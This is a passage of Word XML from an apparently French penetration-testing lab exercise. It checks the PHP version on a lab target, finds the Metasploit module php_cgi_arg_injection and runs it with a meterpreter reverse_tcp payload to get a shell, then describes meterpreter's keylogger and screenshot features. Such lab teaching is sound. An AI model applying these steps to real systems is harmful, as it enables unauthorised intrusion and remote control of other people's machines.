          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> http://192.168.1.179 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09464ED3" w14:textId="77777777" w:rsidR="00C25C17" w:rsidRDefault="00C25C17" w:rsidP="00C25C17">
      <w:pPr>
        <w:pStyle w:val="Sansinterligne"/>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="799DB31A" w14:textId="77777777" w:rsidR="00C25C17" w:rsidRDefault="00C25C17" w:rsidP="00C25C17">
      <w:pPr>
        <w:keepNext/>
      </w:pPr>
      <w:r w:rsidRPr="00C25C17">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1EA3CD29" wp14:editId="2091A202">
            <wp:extent cx="5760720" cy="2931795"/>
            <wp:effectExtent l="0" t="0" r="5080" b="1905"/>
            <wp:docPr id="164666844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68445" name="Image 1" descr="Une image contenant texte, capture d’écran&#10;&#10;Description générée automatiquement"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId39"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5760720" cy="2931795"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F031D02" w14:textId="185CC574" w:rsidR="00C25C17" w:rsidRDefault="00C25C17" w:rsidP="00803B94">
      <w:pPr>
        <w:pStyle w:val="Lgende"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> SEQ Figure \* ARABIC </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="004A490F">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>27</w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="320DB600" w14:textId="77777777" w:rsidR="00C532EB" w:rsidRDefault="00C532EB">
      <w:pPr>
        <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EBDE6E2" w14:textId="0D88E0C6" w:rsidR="00803B94" w:rsidRDefault="00803B94" w:rsidP="00803B94">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00803B94">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Appelez ensuite ce fichier avec votre navigateur. Quelle version est utilisée ?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F7BC117" w14:textId="63E0FB18" w:rsidR="00C532EB" w:rsidRDefault="00C532EB" w:rsidP="00803B94">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>Pour cela, on écrit cela dans notre navigateur :</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BA027E3" w14:textId="77777777" w:rsidR="00C532EB" w:rsidRDefault="00C532EB" w:rsidP="00803B94">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2BB0D47A" w14:textId="17C4DDB2" w:rsidR="00C532EB" w:rsidRDefault="00C532EB" w:rsidP="00C532EB">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId40" w:history="1">
        <w:r w:rsidRPr="00787989">
          <w:rPr>
            <w:rStyle w:val="Lienhypertexte"/>
            <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
            <w:lang w:eastAsia="en-US"/>
          </w:rPr>
          <w:t>http://IPCIBLE/phpinfo.php</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="2F78ECCC" w14:textId="77777777" w:rsidR="00C532EB" w:rsidRDefault="00C532EB" w:rsidP="00C532EB">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5F0B080F" w14:textId="57D1DD4D" w:rsidR="00C532EB" w:rsidRDefault="00C532EB" w:rsidP="009A69C4">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>Ce qui va nous donner ceci :</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="388850E5" w14:textId="77777777" w:rsidR="00C532EB" w:rsidRDefault="00C532EB" w:rsidP="00C532EB">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4D3F0EC2" w14:textId="77777777" w:rsidR="00803B94" w:rsidRDefault="00803B94" w:rsidP="00803B94">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1F1B76C1" w14:textId="77777777" w:rsidR="00C532EB" w:rsidRDefault="00C532EB" w:rsidP="00C532EB">
      <w:pPr>
        <w:keepNext/>
      </w:pPr>
      <w:r w:rsidRPr="00C532EB">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1707D5D2" wp14:editId="0E82B809">
            <wp:extent cx="4993562" cy="4959985"/>
            <wp:effectExtent l="0" t="0" r="0" b="5715"/>
            <wp:docPr id="174934218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42183" name="Image 1" descr="Une image contenant texte, capture d’écran, nombre, Police&#10;&#10;Description générée automatiquement"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId41"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4993562" cy="4959985"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="581F9000" w14:textId="533DFB3F" w:rsidR="008C7002" w:rsidRDefault="00C532EB" w:rsidP="008C7002">
      <w:pPr>
        <w:pStyle w:val="Lgende"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> SEQ Figure \* ARABIC </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="004A490F">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>28</w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> : Version de PHP utilisée</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C15A704" w14:textId="77777777" w:rsidR="008C7002" w:rsidRDefault="008C7002" w:rsidP="008C7002"/>
    <w:p w14:paraId="34C22223" w14:textId="77777777" w:rsidR="008C7002" w:rsidRDefault="008C7002" w:rsidP="008C7002">
      <w:r w:rsidRPr="008C7002">
        <w:t xml:space="preserve">Quelles sont les arguments à passer à la commande </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="008C7002">
        <w:t>search</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="008C7002">
        <w:t xml:space="preserve"> pour retrouver le nom exact de ce module sachant qu'il date de 2012 (</w:t>
      </w:r>
      <w:r w:rsidRPr="008C7002">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>cve:2012</w:t>
      </w:r>
      <w:r w:rsidRPr="008C7002">
        <w:t>) et qu'il est classé comme excellent (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="008C7002">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>rank</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="008C7002">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>: excellent</w:t>
      </w:r>
      <w:r w:rsidRPr="008C7002">
        <w:t>)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> : </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39AF7297" w14:textId="77777777" w:rsidR="008C7002" w:rsidRDefault="008C7002" w:rsidP="008C7002"/>
    <w:p w14:paraId="62332CC1" w14:textId="77777777" w:rsidR="008C7002" w:rsidRPr="00C86E87" w:rsidRDefault="008C7002" w:rsidP="008C7002">
      <w:pPr>
        <w:pStyle w:val="Sansinterligne"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00C86E87">
        <w:t>Search</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00C86E87">
        <w:t xml:space="preserve"> type :exploit </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00C86E87">
        <w:t>cve</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00C86E87">
        <w:t xml:space="preserve"> :2012 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00C86E87">
        <w:t>rank:excellent</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="669B0D64" w14:textId="77777777" w:rsidR="008C7002" w:rsidRPr="00C86E87" w:rsidRDefault="008C7002" w:rsidP="008C7002">
      <w:pPr>
        <w:pStyle w:val="Sansinterligne"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="583A65E9" w14:textId="77777777" w:rsidR="008C7002" w:rsidRPr="00C86E87" w:rsidRDefault="008C7002" w:rsidP="008C7002">
      <w:pPr>
        <w:pStyle w:val="Sansinterligne"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="532C42FD" w14:textId="77777777" w:rsidR="008C7002" w:rsidRPr="00C86E87" w:rsidRDefault="008C7002" w:rsidP="008C7002">
      <w:pPr>
        <w:pStyle w:val="Sansinterligne"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="40C9609C" w14:textId="77777777" w:rsidR="008C7002" w:rsidRPr="00C86E87" w:rsidRDefault="008C7002" w:rsidP="008C7002">
      <w:pPr>
        <w:pStyle w:val="Sansinterligne"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7F5E023A" w14:textId="77777777" w:rsidR="008C7002" w:rsidRPr="00C86E87" w:rsidRDefault="008C7002" w:rsidP="008C7002">
      <w:pPr>
        <w:pStyle w:val="Sansinterligne"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="10D2EAD1" w14:textId="77777777" w:rsidR="008C7002" w:rsidRPr="00C86E87" w:rsidRDefault="008C7002" w:rsidP="008C7002">
      <w:pPr>
        <w:pStyle w:val="Sansinterligne"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="075E9322" w14:textId="77777777" w:rsidR="008C7002" w:rsidRPr="00C86E87" w:rsidRDefault="008C7002" w:rsidP="008C7002">
      <w:pPr>
        <w:pStyle w:val="Sansinterligne"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="74F93100" w14:textId="523F3CA4" w:rsidR="008C7002" w:rsidRDefault="008C7002" w:rsidP="008C7002">
      <w:r w:rsidRPr="008C7002">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Ce qui va nous donner : </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CFE1180" w14:textId="77777777" w:rsidR="008C7002" w:rsidRDefault="008C7002" w:rsidP="008C7002"/>
    <w:p w14:paraId="44A3B8D4" w14:textId="77777777" w:rsidR="008C7002" w:rsidRDefault="008C7002" w:rsidP="008C7002">
      <w:pPr>
        <w:keepNext/>
      </w:pPr>
      <w:r w:rsidRPr="008C7002">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="056EF64B" wp14:editId="14A1A130">
            <wp:extent cx="5760720" cy="758190"/>
            <wp:effectExtent l="0" t="0" r="5080" b="3810"/>
            <wp:docPr id="1026018484" name="Image 1" descr="Une image contenant texte,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18484" name="Image 1" descr="Une image contenant texte, Logiciel multimédia, capture d’écran&#10;&#10;Description générée automatiquement"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId42"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5760720" cy="758190"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="57F67F65" w14:textId="575F82FB" w:rsidR="008C7002" w:rsidRDefault="008C7002" w:rsidP="008C7002">
      <w:pPr>
        <w:pStyle w:val="Lgende"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> SEQ Figure \* ARABIC </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="004A490F">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>29</w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="102E2902" w14:textId="3D3E2861" w:rsidR="008C7002" w:rsidRDefault="0057677C" w:rsidP="008C7002">
      <w:r>
        <w:t xml:space="preserve">Et l’exploit est le suivant : </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5657CC72" w14:textId="646C6075" w:rsidR="0057677C" w:rsidRDefault="0057677C" w:rsidP="0057677C">
      <w:pPr>
        <w:pStyle w:val="Sansinterligne"/>
      </w:pPr>
      <w:r w:rsidRPr="0057677C">
        <w:t>exploit/multi/http/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0057677C">
        <w:t>php_cgi_arg_injection</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="028C1D8D" w14:textId="77777777" w:rsidR="00965E2B" w:rsidRDefault="00965E2B" w:rsidP="0057677C">
      <w:pPr>
        <w:pStyle w:val="Sansinterligne"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="21565E07" w14:textId="77777777" w:rsidR="00965E2B" w:rsidRPr="00965E2B" w:rsidRDefault="00965E2B" w:rsidP="00965E2B">
      <w:r w:rsidRPr="00965E2B">
        <w:t xml:space="preserve">Utilisez le </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00965E2B">
        <w:t>framework</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00965E2B">
        <w:t xml:space="preserve"> pour exploiter cette </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00965E2B">
        <w:t>vulnerabilité</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00965E2B">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09620498" w14:textId="77777777" w:rsidR="00965E2B" w:rsidRPr="00965E2B" w:rsidRDefault="00965E2B" w:rsidP="00965E2B"/>
    <w:p w14:paraId="1056EABA" w14:textId="77777777" w:rsidR="00965E2B" w:rsidRPr="00965E2B" w:rsidRDefault="00965E2B" w:rsidP="00965E2B"/>
    <w:p w14:paraId="71779B30" w14:textId="77777777" w:rsidR="00965E2B" w:rsidRPr="00965E2B" w:rsidRDefault="00965E2B" w:rsidP="00965E2B"/>
    <w:p w14:paraId="1489746E" w14:textId="77777777" w:rsidR="00965E2B" w:rsidRPr="00965E2B" w:rsidRDefault="00965E2B" w:rsidP="00965E2B"/>
    <w:p w14:paraId="78445A54" w14:textId="77777777" w:rsidR="00965E2B" w:rsidRPr="00965E2B" w:rsidRDefault="00965E2B" w:rsidP="00965E2B">
      <w:r w:rsidRPr="00965E2B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Note :</w:t>
      </w:r>
      <w:r w:rsidRPr="00965E2B">
        <w:t xml:space="preserve"> La commande show payloads affiche la liste des payloads pour cet exploit. Utilisez le payload par défaut </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00965E2B">
        <w:t>php</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00965E2B">
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00965E2B">
        <w:t>meterpreter</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00965E2B">
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00965E2B">
        <w:t>reverse_tcp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00965E2B">
        <w:t xml:space="preserve">. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="714A3575" w14:textId="77777777" w:rsidR="00965E2B" w:rsidRPr="00965E2B" w:rsidRDefault="00965E2B" w:rsidP="00965E2B">
      <w:r w:rsidRPr="00965E2B">
        <w:t xml:space="preserve">Une fois l'exploit lancé (avec la commande run ou exploit) vous devriez vous retrouver dans un shell </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00965E2B">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>meterpreter</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00965E2B">
        <w:t xml:space="preserve">. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F66D870" w14:textId="77777777" w:rsidR="00965E2B" w:rsidRPr="008C7002" w:rsidRDefault="00965E2B" w:rsidP="00965E2B"/>
    <w:p w14:paraId="6AB739D8" w14:textId="77777777" w:rsidR="00965E2B" w:rsidRDefault="00965E2B" w:rsidP="00965E2B">
      <w:pPr>
        <w:keepNext/>
      </w:pPr>
      <w:r w:rsidRPr="00965E2B">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="014403D6" wp14:editId="5E13CD85">
            <wp:extent cx="5760720" cy="1090930"/>
            <wp:effectExtent l="0" t="0" r="5080" b="1270"/>
            <wp:docPr id="50758194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81943" name="Image 1" descr="Une image contenant texte, capture d’écran, Police&#10;&#10;Description générée automatiquement"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId43"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5760720" cy="1090930"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="0623D00F" w14:textId="2E1EF0E7" w:rsidR="008C7002" w:rsidRPr="008C7002" w:rsidRDefault="00965E2B" w:rsidP="00965E2B">
      <w:pPr>
        <w:pStyle w:val="Lgende"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> SEQ Figure \* ARABIC </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="004A490F">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>30</w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B829317" w14:textId="77777777" w:rsidR="00803B94" w:rsidRDefault="00803B94" w:rsidP="00C532EB">
      <w:pPr>
        <w:pStyle w:val="Lgende"/>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="37FA8B6E" w14:textId="6A194730" w:rsidR="00965E2B" w:rsidRDefault="00965E2B" w:rsidP="00965E2B">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
          <w:i/>
          <w:iCs/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>M</w:t>
      </w:r>
      <w:r w:rsidRPr="00965E2B">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
          <w:i/>
          <w:iCs/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>eterpreter</w:t>
      </w:r>
      <w:r w:rsidRPr="00965E2B">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> est un outil qui simplifie la phase de post-exploitation. C'est plus exactement une charge utile (un </w:t>
      </w:r>
      <w:r w:rsidRPr="00965E2B">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
          <w:i/>
          <w:iCs/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>payload</w:t>
      </w:r>
      <w:r w:rsidRPr="00965E2B">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">) particulièrement avancée permettant de simplifier la phase de post-exploitation grâce à la mise à disposition d’un shell interactif. Ce payload, entièrement exécuté en mémoire, intègre de nombreuses fonctionnalités, par exemple télécharger des fichiers, lancer un </w:t>
      </w:r>
      <w:r w:rsidRPr="00965E2B">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
          <w:i/>
          <w:iCs/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>keylogger</w:t>
      </w:r>
      <w:r w:rsidRPr="00965E2B">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">, prendre des captures d’écran, etc.... Meterpreter est principalement disponible pour les cibles Windows. Néanmoins, il existe aussi des payloads permettant d’obtenir une session Meterpreter sous Linux et </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00965E2B">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>MacOS</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00965E2B">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71D5C1FC" w14:textId="77777777" w:rsidR="00965E2B" w:rsidRDefault="00965E2B" w:rsidP="00965E2B">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5B92916D" w14:textId="77777777" w:rsidR="000911E8" w:rsidRDefault="000911E8" w:rsidP="00965E2B">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="15E08EB2" w14:textId="77777777" w:rsidR="000911E8" w:rsidRDefault="000911E8" w:rsidP="00965E2B">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3AAB5EE5" w14:textId="77777777" w:rsidR="000911E8" w:rsidRDefault="000911E8" w:rsidP="00965E2B">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="31911C92" w14:textId="77777777" w:rsidR="000911E8" w:rsidRDefault="000911E8" w:rsidP="00965E2B">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0FB26F86" w14:textId="77777777" w:rsidR="000911E8" w:rsidRDefault="000911E8" w:rsidP="00965E2B">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3638A25D" w14:textId="77777777" w:rsidR="000911E8" w:rsidRDefault="000911E8" w:rsidP="00965E2B">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2DF7E09A" w14:textId="77777777" w:rsidR="000911E8" w:rsidRDefault="000911E8" w:rsidP="00965E2B">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7F93C12B" w14:textId="77777777" w:rsidR="000911E8" w:rsidRDefault="000911E8" w:rsidP="00965E2B">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="13EC618B" w14:textId="77777777" w:rsidR="000911E8" w:rsidRDefault="000911E8" w:rsidP="00965E2B">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
